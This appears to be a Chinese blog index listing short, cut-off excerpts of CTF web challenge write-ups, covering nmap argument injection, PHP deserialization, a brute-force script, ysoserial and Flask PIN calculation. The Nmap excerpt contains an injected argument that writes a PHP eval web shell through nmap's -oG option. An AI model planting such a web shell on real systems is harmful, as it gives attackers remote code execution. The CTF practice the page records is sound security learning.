第一次DAS能通
-
GWCTF2019
打比赛打不过那就来浮现一个
-
安洵杯2019
[安洵杯 2019]easy_serialize_php12345678910111213141516171819202122232425262728293031323334353637383940<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('... -
网鼎杯2020朱雀组
[网鼎杯 2020 朱雀组]Think Javajava代审 [网鼎杯 2020 朱雀组]Nmap12nmap -oG 写入文件 nmap -iL读取扫描文件 黑盒但是随便测测应该就可以绕过了 12345678127.0.0.1'<?=eval($_POST[a]);?> -oG shell.php'Hacker...127.0.0.1'<?... -
bsidescf2020
[BSidesCF 2020]Bulls23先搞下来,解压发现是个html 本地搞个html网页来加载发现可以登录 发现第一个链接就是 1http://bash.org/?random 找到是websocket流量 发现第二个链接 1http://n-gate.com 中途发现端口是8888 但还是不懂,说的要追踪TCP流量,那就追踪 1tcp.stream eq 363 然后随便选一... -
网鼎杯2018
[网鼎杯 2018]Comment随便发帖发现进入后台,告诉了用户名和密码,只不过后三位需要爆破 由于前面是名字所以直接猜测是数字 123456789101112131415161718192021222324252627282930import requestsimport time# 定义URLurl = "http://97f3bfa3-d408-4ae9-b1ac-27b8... -
ciscn西南分区赛2024
给6.16的自己进个步
-
[BUUCTF 2018]Online Tool
这BUU就这一个,看看那
-
ysoserial配置
网上没有写的特别明白的,自己实验了之后写一个
-
flask计算pin值
之前PYCC遇到了,但是不会,现在终于会了